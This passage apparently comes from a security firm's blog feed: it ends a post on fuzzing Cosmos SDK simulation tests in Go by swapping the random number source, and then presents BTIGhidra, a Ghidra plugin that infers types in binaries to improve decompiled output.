        r := rand.New(rand.NewSource(config.Seed))
        …

Figure 6: Lines modified in SimulateFromSeed to load a seed from the fuzz test

However, there is an important flaw in this: changing the seed directly will give the fuzzer a very limited amount of control over the input, so their smart mutations will be very ineffective. Instead, we need to allow the fuzzer to better control the input from the random number generator but without refactoring every simulated function from every module. 😱

Against all odds

The Go standard library already ships a variety of general functions and data structs. In that sense, Go has “batteries included.” In particular, it provides a random number generator in the math/rand module:

// A Rand is a source of random numbers.
type Rand struct {
    src Source
    s64 Source64 // non-nil if src is source64

    // readVal contains remainder of 63-bit integer used for bytes
    // generation during most recent Read call.
    // It is saved so next Read call can start where the previous
    // one finished.
    readVal int64
    // readPos indicates the number of low-order bytes of readVal
    // that are still valid.
    readPos int8
}

… 
// Seed uses the provided seed value to initialize the generator to a deterministic state.
// Seed should not be called concurrently with any other Rand method.
func (r *Rand) Seed(seed int64) {
    if lk, ok := r.src.(*lockedSource); ok {
        lk.seedPos(seed, &r.readPos)
        return
    }

    r.src.Seed(seed)
    r.readPos = 0
}

// Int63 returns a non-negative pseudo-random 63-bit integer as an int64.
func (r *Rand) Int63() int64 { return r.src.Int63() }

// Uint32 returns a pseudo-random 32-bit value as a uint32.
func (r *Rand) Uint32() uint32 { return uint32(r.Int63() >> 31) }
…

Figure 7: Rand data struct and some of its implementation code

However, we can’t easily provide an alternative implementation of this because Rand was declared as a type and not as an interface. But we can still provide our custom implementation of its randomness source (Source/Source64):

// A Source64 is a Source that can also generate
// uniformly-distributed pseudo-random uint64 values in
// the range [0, 1<<64) directly.
// If a Rand r's underlying Source s implements Source64,
// then r.Uint64 returns the result of one call to s.Uint64
// instead of making two calls to s.Int63.
type Source64 interface {
    Source
    Uint64() uint64
}

Figure 8: Source64 data type

Let’s replace the default Source with a new one that uses the input from the fuzzer (e.g., an array of int64) as a deterministic source of randomness (arraySource):

type arraySource struct {
    pos int
    arr []int64
    src *rand.Rand
}
// Uint64 returns a non-negative pseudo-random 64-bit integer as an uint64.
func (rng *arraySource) Uint64() uint64 {
    if (rng.pos >= len(rng.arr)) {
        return rng.src.Uint64()
    }
      val := rng.arr[rng.pos]
    rng.pos = rng.pos + 1
    if val 

Figure 9: An implementation of uint64() to get signed integers from our deterministic source of randomness

This new type of source either pops a number from the array or produces a random value from a standard random source if the array was fully consumed. This allows the fuzzer to continue even if all the deterministic values were consumed.

Ready, Set, Go!

Once we have modified the code to properly control the random source, we can leverage Go fuzzing like this:

$ go test -mod=readonly -run=_ -fuzz=FuzzFullAppSimulation -GenesisTime=1688995849 -Enabled=true -NumBlocks=2 -BlockSize=5 -Commit=true -Seed=0 -Period=1 -Verbose=1 -parallel=15
fuzz: elapsed: 0s, gathering baseline coverage: 0/1 completed
fuzz: elapsed: 1s, gathering baseline coverage: 1/1 completed, now fuzzing with 15 workers
fuzz: elapsed: 3s, execs: 16 (5/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 6s, execs: 22 (2/sec), new interesting: 0 (total: 1)
…
fuzz: elapsed: 54s, execs: 23 (0/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 57s, execs: 23 (0/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 1m0s, execs: 23 (0/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 1m3s, execs: 23 (0/sec), new interesting: 5 (total: 6)
fuzz: elapsed: 1m6s, execs: 30 (2/sec), new interesting: 10 (total: 11)
fuzz: elapsed: 1m9s, execs: 38 (3/sec), new interesting: 11 (total: 12)

Figure 10: A short fuzzing campaign using the new approach

After running this code for a few hours, we collected a number of low-severity bugs in this small trophy case:

We provided the Cosmos SDK team with our patch for improving the simulation tests, and we are in the process of discussing how to better integrate this into the master.

Binary type inference in Ghidra

7 February 2024 at 14:00

By Ian Smith

Trail of Bits is releasing BTIGhidra, a Ghidra extension that helps reverse engineers by inferring type information from binaries. The analysis is inter-procedural, propagating and resolving type constraints between functions while consuming user input to recover additional type information. This refined type information produces more idiomatic decompilation, enhancing reverse engineering comprehension. The figures below demonstrate how BTIGhidra improves decompilation readability without any user interaction:

Figure 1: Default Ghidra decompiler output

Figure 2: Ghidra output after running BTIGhidra

Precise typing information transforms odd pointer arithmetic into field accesses and void* into the appropriate structure type; introduces array indexing where appropriate; and reduces the clutter of void* casts and dereferences. While type information is essential to high-quality decompilation, the recovery of precise type information unfortunately presents a major challenge for decompilers and reverse engineers. Information about a variable’s type is spread throughout the program wherever the variable is used. For reverse engineers, it is difficult to keep a variable’s dispersed usages in their heads while reasoning about a local type. We created BTIGhidra in an effort to make this challenge a thing of the past.

A simple example

Let’s see how BTIGhidra can improve decompiler output for an example binary taken from a CTF challenge called mooosl (figure 3). (Note: Our GitHub repository has directions for using the plugin to reproduce this demo.) The target function, called lookup, iterates over nodes in a linked list until it finds a node with a matching key in a hashmap stored in list_heads.1 This function hashes the queried key, then selects the linked list that stores all nodes that have a key equal to that hash. Next, it traverses the linked list looking for a key that is equal to the key parameter.

Figure 3: Linked-list lookup function from mooosl

The structure for linked list nodes (figure 4) is particularly relevant to this example. The structure has buffers for the key and value stored in the node, along with sizes for each buffer. Additionally, each node has a next pointer that is either null or points to the next node in the linked list.

Figure 4: Linked list node structure definition

Figure 5 shows Ghidra’s initial decompiler output for the lookup function (FUN_001014fb). The overall decompilation quality is low due to poor type information across the function. For example, the recursive pointer next in the source code causes Ghidra to emit a void** type for the local variable (local_18), and the return type. Also, the type of the key_size function parameter, referred to as param_2 in the output, is treated as a void* type despite not being loaded from. Finally, the access to the global variable that holds linked list head nodes, referred to as DAT_00104010, is not treated as an array indexing operation.

Figure 5: Ghidra decompiler output for the lookup function without type inference.
Highlighted red text is changed after running type inference.

Figure 6 shows a diff against the code in figure 5 after running BTIGhidra. Notice that the output now captures the node structure and the recursive type for the next pointer, typed as struct_for_node_0_9* instead of void**. BTIGhidra also resolves the return type to the same type. Additionally, the key_size parameter (param_2) is no longer treated as a pointer. Finally, the type of the global variable is updated to a pointer to linked list node pointers (PTR_00104040), causing Ghidra to treat the load as an array indexing operation.

Figure 6: Ghidra decompiler output for the lookup function with type inference.
Highlighted green text was added by type inference.

BTIGhidra infers types by collecting a set of subtyping constraints and then solving those constraints. Usages of known function signatures act as sources for type constraints. For instance, the call to memcmp in figure 5 results in a constraint on param_2 declaring that param2 must be a subtype size_t. Notice in the figure that BTIGhidra also successfully identifies the four fields used in this function, while also recovering the additional fields used elsewhere in the binary.

Additionally, users can supply a known function signature to provide additional type information for the type inference algorithm to propagate across the decompiled program. Figure 6 demonstrates how new type information from a known function signature (value_dump in this case) flows from a call site to the return type from the lookup function (referred to as FUN_001014fb in the decompiled output) in figure 5. The red line depicts how the user-defined function signature for value_dump is used to infer the types of field_at_8 and field_at_24 for the returned struct_for_node_0_9 from the original function FUN_001014fb. The type information derived from this call is combined with all other call sites to FUN_001014fb in order to remain conservative in the presence of polymorphism.

Figure 7: Back-propagation of type information derived from value_dump function signature

Ultimately, BTIGhidra fills in the type information for the recovered structure’s used fields, shown in figure 8. Here, we see that the types for field_at_8 and field_at_24 are inferred via the invocation of value_dump. However, the fields with type undefined8 indicate that the field was not sufficiently constrained by the added function signature to derive an atomic type for the field (i.e., there are no usages that relate the field to known type information); the inference algorithm has determined only that the field must be eight bytes.

Figure 8: Struct type information table for decompiled linked list nodes

Ghidra’s decompiler does perform some type propagation using known function signatures provided by its predefined type databases that cover common libraries such as libc. When decompiling the binary’s functions that call known library functions, these type signatures are used to guess likely types for the variables and parameters of the calling function. This approach has several limitations. Ghidra does not attempt to synthesize composite types (i.e., structs and unions) without user intervention; it is up to the user to define when and where structs are created. Additionally, this best-effort type propagation approach has limited inter-procedural power. As shown in figure 9, Ghidra’s default type inference results in conflicting types for FUN_1014fb and FUN_001013db (void* versus long and ulong), even though parameters are passed directly between the two functions.

Figure 9: Default decompiler output using Ghidra’s basic type inference

Our primary motivation for developing BTIGhidra is the need for a type inference algorithm in Ghidra that can propagate user-provided type information inter-procedurally. For such an algorithm to be useful, it should not guess a “wrong” type. If the user submits precise and correct type information, then the type inference algorithm should not derive conflicting type information that prevents user-provided types from being used. For instance, if the user provides a correct type float and we infer a type int, then these types will conflict resulting in a type error (represented formally by a bottom lattice value). Therefore, inferred types must be conservative; the algorithm should not derive a type for a program variable that conflicts with its source-level type. In a type system with subtyping, this property can be phrased more precisely as “an inferred type for a program variable should always be a supertype of the actual type of the program variable.”

In addition to support for user-provided types, BTIGhidra overcomes many other shortcomings of Ghidra’s built-in type inference algorithm. Namely, BTIGhidra can operate over stripped binaries, synthesize composite types, ingest user-provided type constraints, derive conservative typing judgments, and collect a well-defined global view of a binary’s types.

Bringing type-inference to binaries

At the source level, type inference algorithms work by collecting type constraints on program terms that are expressed in the program text, which are then solved to produce a type for each term. BTIGhidra operates on similar principles, but needs to compensate for information loss introduced by compilation and C’s permissive types. BTIGhidra uses an expressive type system that supports subtyping, polymorphism, and recursive types to reason about common programming idioms in C that take advantage of the language’s weak types to emulate these type system features. Also, subtyping, when combined with reaching definitions analysis, allows the type inference algorithm to handle compiler-introduced behavior, such as register and stack variable reuse.

Binary type inference proceeds similarly, but information lost during compilation increases the difficulty of collecting type constraints. To meet this challenge, BTIGhidra runs various flow-sensitive data-flow analyses (e.g., value-set analysis) provided by and implemented using FKIE-CAD’s cwe_checker to track how values flow between program variables. These flows inform which variables or memory objects must be subtypes of other objects. Abstractly, if a value flows from a variable x into a variable y, then we can conservatively conclude that x is a subtype of y.

Using this data-flow information, BTIGhidra independently generates subtyping constraints for each strongly connected component (SCC)2 of functions in the binary’s call graph. Next, BTIGhidra simplifies signatures by using a set of proof rules to solve for all derivable relationships between interesting variables (i.e., type constants like int and size_t, functions, and global variables) within an SCC. These signatures act as a summary of the function’s typing effects when it is called. Finally, BTIGhidra solves for the type sketch of each SCC, using the signatures of called SCCs as needed.

Type sketches are our representation of recursively constrained types. They represent a type as a directed graph, with edges labeled by fields that represent the capabilities of a type and nodes labeled by a bound [lb,ub]. Figure 10 shows an example of a type sketch for the value_dump function signature. As an example, the path from node 3 to 8 can be read as “the type with ID 3 is a function that has a second in parameter which is an atomic type that is a subtype of size_t and a supertype of bottom.” These sketches provide a convenient representation of types when lowering to C types through a fairly straightforward graph traversal. Type sketches also form a lattice with a join and meet operator defined by language intersection and union, respectively. These operations are useful for manipulating types while determining the most precise polymorphic type we can infer for each function in the binary. Join allows the algorithm to determine the least supertype of two sketches, and meet allows the algorithm to determine the greatest subtype of two sketches.

Figure 10: Type sketch for the value_dump function signature

The importance of polymorphic type inference

Using a type system that supports polymorphism may seem odd for inferring C types when C has no explicit support for polymorphism. However, polymorphism is critical for maintaining conservative types in the presence of C idioms, such as handling multiple types in a function by dispatching over a void pointer. Perhaps the most canonical examples of polymorphic functions in C are malloc and free.

Figure 11: Example program that uses free polymorphically

In the example above, we consider a simple (albeit contrived) program that passes two structs to free. We access the fields of both foo and bar to reveal field information to the type inference algorithm. To demonstrate the importance of polymorphism, I modified the constraint generation phase of type inference to generate a single formal type variable for each function, rather than a type variable per call site. This change has the effect of unifying all constraints on free, regardless of the calling context.

The resulting unsound decompilation is as follows:

struct_for_node_0_13 * produce(struct_for_node_0_13
*param_1,struct_for_node_0_13 *param_2)

{
  param_1->field_at_0 = param_2->field_at_8;
  param_1->field_at_8 = param_2->field_at_0;
  param_1->field_at_16 = param_2->field_at_0;
  free(param_1);
  free(param_2);
  return param_1;
}

Figure 12: Unsound inferred type for the parameters to produce

The assumption that function calls are non-polymorphic leads to inferring an over-precise type for the function’s parameters (shown in figure 12), causing both parameters to have the same type with three fields.

Instead of unifying all call sites of a function, BTIGhidra generates a type variable per call site and unifies the actual parameter type with the formal parameter type only if the inferred type is structurally equal after a refinement pass. This conservative assumption allows BTIGhidra to remain sound and derive the two separate types for the parameters to the function in figure 11:

struct_for_node_0_16 * produce(struct_for_node_0_16
*param_1,struct_for_node_0_20 *param_2)

{
  param_1->field_at_0 = param_2->field_at_8;
  param_1->field_at_8 = param_2->field_at_0;
  param_1->field_at_16 = param_2->field_at_0;
  free(param_1);
  free(param_2);
  return param_1;
} 

Evaluating BTIGhidra

Inter-procedural type inference on binaries operates over a vast set of information collected on the target program. Each analysis involved is a hard computational problem in its own right. Ghidra and our flow-sensitive analyses use heuristics related to control flow, ABI information, and other constructs. These heuristics can lead to incorrect type constraints, which can have wide-ranging effects when propagated.

Mitigating these issues requires a strong testing and validation strategy. In addition to BTIGhidra itself, we also released BTIEval, a tool for evaluating the precision of type inference on binaries with known ground-truth types. BTIEval takes a binary with debug information and compares the types recovered by BTIGhidra to those in the debug information (the debug info is ignored during type inference). The evaluation utility aggregates soundness and precision metrics. Utilizing BTIEval more heavily and over more test binaries will help us provide better correctness guarantees to users. BTIEval also collects timing information, allowing us to evaluate the performance impacts of changes.

Give BTIGhidra a try

The pre-built Ghidra plugin is located here or can be built from the source. The walkthrough instructions are helpful for learning how to run the analysis and update it with new type signatures. We look forward to getting feedback on the tool and welcome any contributions!

Acknowledgments

BTIGhidra’s underlying type inference algorithm was inspired by and is based on an algorithm proposed by Noonan et al. The methods described in the paper are patented under process patent US10423397B2 held by GrammaTech, Inc. Any opinions, findings, conclusions, or recommendations expressed in this blog post are those of the author(s) and do not necessarily reflect the views of GrammaTech, Inc.

We would also like to thank the team at FKIE-CAD behind CWE Checker. Their static analysis platform over Ghidra PCode provided an excellent base set of capabilities in our analysis.

This research was conducted by Trail of Bits based upon work supported by DARPA under Contract No. HR001121C0111 (Distribution Statement A, Approved for Public Release: Distribution Unlimited). Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the United States Government or DARPA.

1Instructions for how to use the plugin to reproduce this demo are available here.
2A strongly connected component of a graph is a set of nodes in a directed graph where there exists a path from each node in the set to every other node in the set. Conceptually an SCC of functions separates the call graphs into groups of functions that do not recursively call each other.

❌
❌